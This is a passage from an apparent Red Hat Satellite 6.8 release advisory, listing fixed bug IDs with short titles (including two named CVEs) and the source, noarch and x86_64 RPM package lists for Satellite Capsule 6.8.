1849680 - Task progress decimal precision discrepancy between UI, CLI, and API
1849869 - Unable to recycle the dynflow executor
1850355 - Auth Source Role Filters are not working in Satellite 6.8
1850536 - Can't add RHEV with APIv3 through Hammer
1850914 - Checksum type "sha256" is not available for all units in the repository. Make sure those units have been downloaded
1850934 - Satellite-installer failed with error "Could not evaluate: Proxy xyz..com cannot be retrieved: unknown error (response 502)"
1851017 - Position of text cursor in ace-editor wrong and hence unable to edit templates
1851030 - [RFE] Upgrade Ansible used from RHEL to be 2.9
1851167 - Autoattach -> "undefined" subscription added
1851176 - Subscriptions do not provide any repository sets
1851952 - "candlepin_events FAIL Not running" and wont restart
1852371 - Allow http proxy ports by default
1852723 - Broken link for documentation on installation media page
1852733 - Inventory upload documentation redirects to default location
1852735 - New version of the plugin is available: 2.0.8
1853076 - large capsule syncs cause slow processing of dynflow tasks/steps
1853200 - foreman-rake-db:migrate Fails on "No indexes found on foreman_tasks_locks with the options provided"
1853280 - Content view filter is excluding modules and Packages when published after upgrading the Satellite from 6.6 to 6.7
1853463 - Plugin does not upload inventory - Permission denied /var/lib/foreman/red_hat_inventory/uploads/uploader.sh
1853504 - [Regression] Hammer export-legacy Fails with Composite Content Views
1853572 - Broken documentation link for 'RHV' in Compute Resource
1854138 - System purpose status should show as 'disabled' when Satellite is in Simple Content Access mode.
1854397 - Compliance reports are not being uploaded to satellite.
1854530 - PG::NotNullViolation when syncing hosts from cloud
1855008 - Host parameters are set after the host is created.
1855254 - Links to documentation broken in HTTP Proxies setup
1855348 - katello_applicability accidentally set to true at install
1855710 - 'Ensure RPM repository is configured and enabled' task says 'FIXME'
1856370 - Clicking on any other tab other than overview while on capsule synchronizing page, redirects to overview page.
1856379 - Add missing VM creation tests
1856401 - [RFE] Add module to create HTTP Proxy
1856831 - New version of the plugin is available: 2.0.9
1856837 - undefined method '#httpboot' for NilClass::Jail (NilClass) when creating an IPv6 only host
1857124 - Attempting to attach a subscription to an unregistered host results in ISE 500
1857146 - Unable to build a host bootdisk image due to missing dosfstools package - Failed to format the ESP image via mkfs.msdos
1857184 - selinux is preventing to build a bootdisk iso - Failed to format the ESP image via mkfs.msdos
1857377 - Capsule Upgrade Playbook fails with "Failed to initialize: NoMethodError - undefined method default_capsule' for Katello:Module"
1857506 - Capsule Upgrade Fail: satellite-installer --scenario capsule --upgrade throws NameError
1857572 - tailoring-file and scap-content command of hammer downloads file with wrong filename.
1857726 - Warnings are shown during the satellite package installation on RHEL 7.9
1858237 - Upgraded Satellite has duplicated katello_pools indexes
1858284 - CVE-2020-14334 foreman: unauthorized cache read on RPM-based installations through local user
1858819 - katello-certs-check output print foreman-installer--scenario katello instead satellite-installer --scenario satellite
1858855 - Creating compute resources on IPV6 network does not fail gracefully
1859158 - Unknown HTTPBoot EFI hosts are not directed to the grubx64.efi with a default grub conf
1859194 - load_hosts macro duplicated in a list of macros
1859276 - Need to update the deprecation warning message on Statistics and Trends page.
1859705 - Tomcat is not running on fresh Capsule installation
1859929 - User can perform other manifest actions while the first one starts
1860351 - 'Host - compare content hosts packages' report fails with error 'undefined method '#first' for NilClass'
1860407 - remote job-status table should not be re-loaded every second even if a job is running or completed
1860422 - Host with remediations can't be removed
1860430 - 'Host - compare content hosts packages' report: Safemode doesn't allow to access 'version'...
1860444 - After the system reboot, capsule setup(upgraded or newly installed 6.8 capsule) fails to start the tomcat service
1860519 - Browsing capsule /pub directory with https fails with forbidden don't have permission to access /pub/ error.
1860585 - Content Host Registration page showing version 6.7 for repos instead 6.8
1860587 - Documentation link in Administer -> About pointing to 6.6 document.
1860835 - Installed Packages not displayed on About page
1860957 - Unable to select an organization for sync management
1861367 - Import Template sync never completes
1861397 - UI dialog for Capsule Upgrade Playbook job doesn't state whitelist_options is required
1861422 - Error encountered while handling the response, replying with an error message ('plugin_config')
1861656 - smart-proxy-openscap-send command fails to upload reports to satellite.
1861724 - ipv6: host form in interfaces are showing Error generating IP: Bad Request
1861766 - Add ability to list traces by host with hammer
1861807 - Cancel/Abort button should be disabled once REX job is finish
1861816 - Error only on production builds: The Dynflow world was not initialized yet. If your plugin uses it, make sure to call Rails.application.dynflow.require! in some initializer
1861831 - satellite-change-hostname cannot change the satellite hostname after failing.
1861890 - Recommended repos do not match Satellite version
1861970 - Content -> Product doesn't work when no organization is selected
1862135 - updating hosts policy using bulk action fails with sql error
1862445 - compliance policy creation fails for ansible deployment option on upgraded satellite.
1862772 - Default repositories are not enabled, after registering a client with an Activation Key, to an org with Simple Content Access Mode in Red Hat Satellite 6
1865871 - Obfuscated hosts do not have domain reported
1865872 - Templates doc - examples on onepage.html are not processed
1865874 - Add inventory status to host
1865876 - Make recommendations count in hosts index a link
1865879 - Add automatic scheduler for insights sync
1865880 - Add an explanation how to enable insights sync
1865928 - Templates documentation help page has hard-coded Satellite setting value
1865943 - dynflow-sidekiq results in messages logs getting filled up more frequently
1866029 - Templates DSL documentation: Parts of description are put in <pre> tag
1866436 - host search filter does not work in job invocation page
1866461 - Run action is missing in job templates page
1866515 - ForemanVirtWhoConfigure::AuthSourceHiddenWithAuthentication is displayed on auth sources page
1866700 - Hammer CLI is missing "resolve" (traces) option for katello-tracer
1866710 - Wrong API endpoint path referenced for resolving host traces
1867239 - hammer content-view version incremental-update fails with ISE
1867287 - Error Row was updated or deleted by another transaction when deleting docker repository
1867311 - Upgrade fails when checkpoint_segments postgres parameter configured
1867399 - Receptor-satellite isn't able to deal with jobs where all the hosts are unknown to satellite
1867895 - API Create vmware ComputeResource fails with "Datacenter can't be blank"
1868183 - Unable to change virt-who hypervisor location.
1868971 - Receptor installation job doesn't properly escape data it puts into receptor.conf
1869640 - client-dispatcher: wrong number of arguments (given 0, expected 1..3) (ArgumentError)' messages come in upgrade and installation.
1869812 - Tasks fail to complete under load
1870657 - Make rake console run as a dynflow client to allow access to features provided by dynflow
1871016 - managercli.py:1364 - Error: Unable to retrieve service levels: HTTP error (404 - Not Found)
1871434 - theme css ".container" class rule is too generic
1871729 - ansible-runner implementation depends on third party repository for ansible-runner package.
1871815 - Satellite Ansible Collection - Provisioning a host fails with timeout
1871978 - Bug in provisioning_template Module
1872014 - Enable web console on host error in "Oops, we're sorry but something went wrong ERF42-5962 [Foreman::Exception]: No template mapped to feature Enable web console"
1872041 - Host search returns incorrect result
1873408 - Updating the CDN URL is manifest works fine but creates some tasks which remains in planned state with success result
1873926 - CVE-2020-14380 Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover
1874143 - Red Hat Inventory Uploads does not use proxy
1874160 - Changing Content View of a Content Host needs to better inform the user around client needs
1874168 - Sync Plan fails with 'uninitialized constant Actions::Foreman::Exception'
1874171 - [RFE] Allow Subscription-manager service plugin for zypper (SLES) to set autorefresh in repo file
1874172 - [6.7] Unable to re-import subscriptions in large environment (60k+ content hosts)
1874175 - After upgrading to 6.7 and promoting content, Capsule sync is extremely slow
1874176 - Unable to search by value of certain Hostgroup parameter
1874422 - Hits Sync uses only old proxy setting
1874619 - Hostgroup tag is never reported in slice
1875357 - After upgrade server response check failed for candlepin.
1875426 - Azure VM provision fails with errorrequests.exceptions.HTTPError: 502 Server Error: Proxy Error for url`
1875660 - Reporting Template macros host_cores is not working as expected
1875667 - Audit page list incorrect search filter
1877307 - [Authentication] External auth login using Kerberos SSO is failing for AD and IDM on Satellite 6.8 only
1877354 - [Sat6/Bug] RHEL8 systems generate false positive warnings about repo binding
1877443 - Post Satellite 6.8 Upgrade AD authentication via LDAP fails when using an A record which returns 42 entries
1877452 - content set mappings for satellite-tools-6.8-for-rhel-8 AUS repos are missing from cdn/cs_mappings-.csv
1877520 - content set mappings for satellite-tools-6.8-for-rhel-8 EUS repos are missing from cdn/cs_mappings-.csv
1877542 - content set mappings for rhel7 satellite-tools-6.8 EUS repos are missing from cdn/cs_mappings-.csv
1878194 - In Capsule upgrade, "yum update" dump some error messages.
1878556 - PXE provisioning in satellite 6.8 requires httpboot enabled
1878693 - Unable to perform image based deployment using hosts module from Red Hat Satellite Ansible Collections
1878850 - creating host from hg doesn't resolves the user-data template
1879151 - Remote execution status not updating with large number of hosts
1879448 - Add hits details to host details page
1879451 - Stop uploading if Satellite's setting is disconnected
1879453 - Add plugin version to report metadata
1879571 - unable to kexec discovered hosts - satellite tries to reach wrong IP
1880637 - [6.8] satellite-installer always runs upgrade steps
1881066 - Safemode doesn't allow to access 'host_cores' on #
1881078 - Use Passenger instead of Puma as the Foreman application server
1881988 - [RFE] IPv6 support for Satellite 6.8
1882276 - Satellite installation fails at execution of '/usr/sbin/foreman-rake -- config -k 'remote_execution_cockpit_url' -v '/webcon/=%{host}''
1882389 - Search query in template for LEAPP upgrade should be pre-filled when running from pre-upgrade results
1883093 - installer-upgrade failed with error "Could not evaluate: Proxy XYZ.com cannot be retrieved: unknown error (response 500)"
1883472 - [Sat6.8/Bug] when registering more than ~240 in parallel getting this error "HTTP error (500 - Internal Server Error): Unable to register system, not all services available"
1887483 - Access insights pages refer to non-existing stylesheets, resulting in completely broken visuals
1887489 - Insights rules can't be loaded on freshly installed Satellite system
1887808 - Satellite-installer fails because of outdated RHSCL repository on DVD ISO
- Package List:
Red Hat Satellite Capsule 6.8:
Source: ansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm ansible-runner-1.4.6-1.el7ar.src.rpm ansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm ansiblerole-insights-client-1.7.1-1.el7sat.src.rpm ansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm createrepo_c-0.7.4-1.el7sat.src.rpm foreman-2.1.2.19-1.el7sat.src.rpm foreman-bootloaders-redhat-202005201200-1.el7sat.src.rpm foreman-discovery-image-3.6.7-1.el7sat.src.rpm foreman-discovery-image-service-1.0.0-3.el7sat.src.rpm foreman-installer-2.1.2.8-1.el7sat.src.rpm foreman-proxy-2.1.2-2.el7sat.src.rpm future-0.16.0-11.el7sat.src.rpm gofer-2.12.5-7.el7sat.src.rpm hfsplus-tools-332.14-12.el7.src.rpm katello-3.16.0-1.el7sat.src.rpm katello-certs-tools-2.7.1-1.el7sat.src.rpm katello-client-bootstrap-1.7.5-1.el7sat.src.rpm katello-selinux-3.4.0-1.el7sat.src.rpm kobo-0.5.1-1.el7sat.src.rpm libmodulemd-1.7.0-1.pulp.el7sat.src.rpm libsolv-0.7.4-4.pulp.el7sat.src.rpm libwebsockets-2.4.2-2.el7.src.rpm livecd-tools-20.4-1.6.el7sat.src.rpm mod_xsendfile-0.12-11.el7sat.src.rpm ostree-2017.1-2.atomic.el7.src.rpm pulp-2.21.3-1.el7sat.src.rpm pulp-docker-3.2.7-1.el7sat.src.rpm pulp-katello-1.0.3-1.el7sat.src.rpm pulp-ostree-1.3.1-2.el7sat.src.rpm pulp-puppet-2.21.3-2.el7sat.src.rpm pulp-rpm-2.21.3-2.el7sat.src.rpm puppet-agent-6.14.0-2.el7sat.src.rpm puppet-agent-oauth-0.5.1-3.el7sat.src.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm puppetlabs-stdlib-4.25.1-2.el7sat.src.rpm puppetserver-6.13.0-1.el7sat.src.rpm pycairo-1.16.3-9.el7sat.src.rpm pygobject3-3.28.3-2.el7sat.src.rpm python-amqp-2.2.2-5.el7sat.src.rpm python-anyjson-0.3.3-11.el7sat.src.rpm python-apypie-0.2.2-1.el7sat.src.rpm python-billiard-3.5.0.3-3.el7sat.src.rpm python-blinker-1.3-2.el7sat.src.rpm python-celery-4.0.2-9.el7sat.src.rpm python-click-6.7-9.el7sat.src.rpm python-crane-3.3.1-9.el7sat.src.rpm python-daemon-2.1.2-7.el7at.src.rpm python-django-1.11.29-1.el7sat.src.rpm python-flask-0.12.2-4.el7sat.src.rpm python-gnupg-0.3.7-1.el7ui.src.rpm python-isodate-0.5.4-12.el7sat.src.rpm python-itsdangerous-0.24-15.el7sat.src.rpm python-jinja2-2.10-10.el7sat.src.rpm python-jmespath-0.9.0-6.el7_7.src.rpm python-kid-0.9.6-11.el7sat.src.rpm python-kombu-4.0.2-13.el7sat.src.rpm python-lockfile-0.11.0-10.el7ar.src.rpm python-markupsafe-0.23-21.el7sat.src.rpm python-mongoengine-0.10.5-2.el7sat.src.rpm python-nectar-1.6.2-1.el7sat.src.rpm python-oauth2-1.5.211-8.el7sat.src.rpm python-okaara-1.0.37-2.el7sat.src.rpm python-pexpect-4.6-1.el7at.src.rpm python-psutil-5.0.1-3.el7sat.src.rpm python-ptyprocess-0.5.2-3.el7at.src.rpm python-pycurl-7.43.0.2-4.el7sat.src.rpm python-pymongo-3.2-2.el7sat.src.rpm python-qpid-1.35.0-5.el7.src.rpm python-semantic_version-2.2.0-6.el7sat.src.rpm python-simplejson-3.2.0-1.el7sat.src.rpm python-twisted-16.4.1-12.el7sat.src.rpm python-vine-1.1.3-6.el7sat.src.rpm python-werkzeug-0.12.2-5.el7sat.src.rpm python-zope-interface-4.0.5-4.el7.src.rpm qpid-cpp-1.36.0-28.el7amq.src.rpm qpid-dispatch-1.5.0-4.el7.src.rpm qpid-proton-0.28.0-3.el7.src.rpm redhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm repoview-0.6.6-11.el7sat.src.rpm rubygem-fast_gettext-1.1.0-4.el7sat.src.rpm rubygem-highline-1.7.8-3.el7sat.src.rpm rubygem-newt-0.9.6-3.el7sat.src.rpm rubygem-oauth-0.5.4-2.el7sat.src.rpm saslwrapper-0.22-5.el7sat.src.rpm satellite-6.8.0-1.el7sat.src.rpm satellite-installer-6.8.0.11-1.el7sat.src.rpm tfm-6.1-1.el7sat.src.rpm tfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm tfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm tfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm tfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm tfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm tfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm tfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm tfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm tfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm tfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm tfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm tfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm tfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm tfm-rubygem-highline-1.7.8-4.el7sat.src.rpm tfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm tfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm tfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm tfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm tfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm tfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm tfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm tfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm tfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm tfm-rubygem-logging-2.2.2-6.el7sat.src.rpm tfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm tfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm tfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm tfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm tfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm tfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm tfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm tfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm tfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm tfm-rubygem-rack-2.2.3-1.el7sat.src.rpm tfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm tfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm tfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm tfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm tfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm tfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm tfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm tfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm tfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm tfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm tfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm tfm-rubygem-unf-0.1.3-7.el7sat.src.rpm tfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm tfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm
noarch: ansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm ansible-runner-1.4.6-1.el7ar.noarch.rpm ansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm ansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm ansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm crane-selinux-3.4.0-1.el7sat.noarch.rpm foreman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm foreman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm foreman-debug-2.1.2.19-1.el7sat.noarch.rpm foreman-discovery-image-3.6.7-1.el7sat.noarch.rpm foreman-installer-2.1.2.8-1.el7sat.noarch.rpm foreman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm foreman-proxy-2.1.2-2.el7sat.noarch.rpm foreman-proxy-content-3.16.0-1.el7sat.noarch.rpm foreman-proxy-journald-2.1.2-2.el7sat.noarch.rpm katello-certs-tools-2.7.1-1.el7sat.noarch.rpm katello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm katello-common-3.16.0-1.el7sat.noarch.rpm katello-debug-3.16.0-1.el7sat.noarch.rpm kobo-0.5.1-1.el7sat.noarch.rpm pulp-admin-client-2.21.3-1.el7sat.noarch.rpm pulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm pulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm pulp-katello-1.0.3-1.el7sat.noarch.rpm pulp-maintenance-2.21.3-1.el7sat.noarch.rpm pulp-nodes-child-2.21.3-1.el7sat.noarch.rpm pulp-nodes-common-2.21.3-1.el7sat.noarch.rpm pulp-nodes-parent-2.21.3-1.el7sat.noarch.rpm pulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm pulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm pulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm pulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm pulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm pulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm pulp-selinux-2.21.3-1.el7sat.noarch.rpm pulp-server-2.21.3-1.el7sat.noarch.rpm puppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm puppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm puppetserver-6.13.0-1.el7sat.noarch.rpm python-blinker-1.3-2.el7sat.noarch.rpm python-gnupg-0.3.7-1.el7ui.noarch.rpm python-gofer-2.12.5-7.el7sat.noarch.rpm python-gofer-qpid-2.12.5-7.el7sat.noarch.rpm python-kid-0.9.6-11.el7sat.noarch.rpm python-mongoengine-0.10.5-2.el7sat.noarch.rpm python-nectar-1.6.2-1.el7sat.noarch.rpm python-oauth2-1.5.211-8.el7sat.noarch.rpm python-pulp-agent-lib-2.21.3-1.el7sat.noarch.rpm python-pulp-bindings-2.21.3-1.el7sat.noarch.rpm python-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm python-pulp-common-2.21.3-1.el7sat.noarch.rpm python-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm python-pulp-integrity-2.21.3-2.el7sat.noarch.rpm python-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm python-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm python-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm python-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm python-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm python-pulp-streamer-2.21.3-1.el7sat.noarch.rpm python-qpid-1.35.0-5.el7.noarch.rpm python-semantic_version-2.2.0-6.el7sat.noarch.rpm python2-amqp-2.2.2-5.el7sat.noarch.rpm python2-ansible-runner-1.4.6-1.el7ar.noarch.rpm python2-anyjson-0.3.3-11.el7sat.noarch.rpm python2-apypie-0.2.2-1.el7sat.noarch.rpm python2-celery-4.0.2-9.el7sat.noarch.rpm python2-click-6.7-9.el7sat.noarch.rpm python2-crane-3.3.1-9.el7sat.noarch.rpm python2-daemon-2.1.2-7.el7at.noarch.rpm python2-django-1.11.29-1.el7sat.noarch.rpm python2-flask-0.12.2-4.el7sat.noarch.rpm python2-future-0.16.0-11.el7sat.noarch.rpm python2-isodate-0.5.4-12.el7sat.noarch.rpm python2-itsdangerous-0.24-15.el7sat.noarch.rpm python2-jinja2-2.10-10.el7sat.noarch.rpm python2-jmespath-0.9.0-6.el7_7.noarch.rpm python2-kombu-4.0.2-13.el7sat.noarch.rpm python2-lockfile-0.11.0-10.el7ar.noarch.rpm python2-okaara-1.0.37-2.el7sat.noarch.rpm python2-pexpect-4.6-1.el7at.noarch.rpm python2-ptyprocess-0.5.2-3.el7at.noarch.rpm python2-vine-1.1.3-6.el7sat.noarch.rpm python2-werkzeug-0.12.2-5.el7sat.noarch.rpm qpid-dispatch-tools-1.5.0-4.el7.noarch.rpm qpid-tools-1.36.0-28.el7amq.noarch.rpm redhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm repoview-0.6.6-11.el7sat.noarch.rpm rubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm rubygem-highline-1.7.8-3.el7sat.noarch.rpm rubygem-oauth-0.5.4-2.el7sat.noarch.rpm satellite-capsule-6.8.0-1.el7sat.noarch.rpm satellite-common-6.8.0-1.el7sat.noarch.rpm satellite-debug-tools-6.8.0-1.el7sat.noarch.rpm satellite-installer-6.8.0.11-1.el7sat.noarch.rpm tfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm tfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm tfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm tfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm tfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm tfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm tfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm tfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm tfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm tfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm tfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm tfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm tfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm tfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm tfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm tfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm tfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm tfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm tfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm tfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm tfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm tfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm tfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm tfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm tfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm tfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm tfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm tfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm tfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm tfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm tfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm tfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm tfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm tfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm tfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm tfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm tfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm tfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm
x86_64: createrepo_c-0.7.4-1.el7sat.x86_64.rpm createrepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm createrepo_c-libs-0.7.4-1.el7sat.x86_64.rpm foreman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm foreman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm hfsplus-tools-332.14-12.el7.x86_64.rpm hfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm libmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm libmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm libsolv-0.7.4-4.pulp.el7sat.x86_64.rpm libsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm libwebsockets-2.4.2-2.el7.x86_64.rpm libwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm livecd-tools-20.4-1.6.el7sat.x86_64.rpm mod_xsendfile-0.12-11.el7sat.x86_64.rpm mod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm ostree-2017.1-2.atomic.el7.x86_64.rpm ostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm puppet-agent-6.14.0-2.el7sat.x86_64.rpm pycairo-1.16.3-9.el7sat.x86_64.rpm pycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm pygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm python-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm python-bson-3.2-2.el7sat.x86_64.rpm python-imgcreate-20.4-1.6.el7sat.x86_64.rpm python-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm python-psutil-5.0.1-3.el7sat.x86_64.rpm python-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm 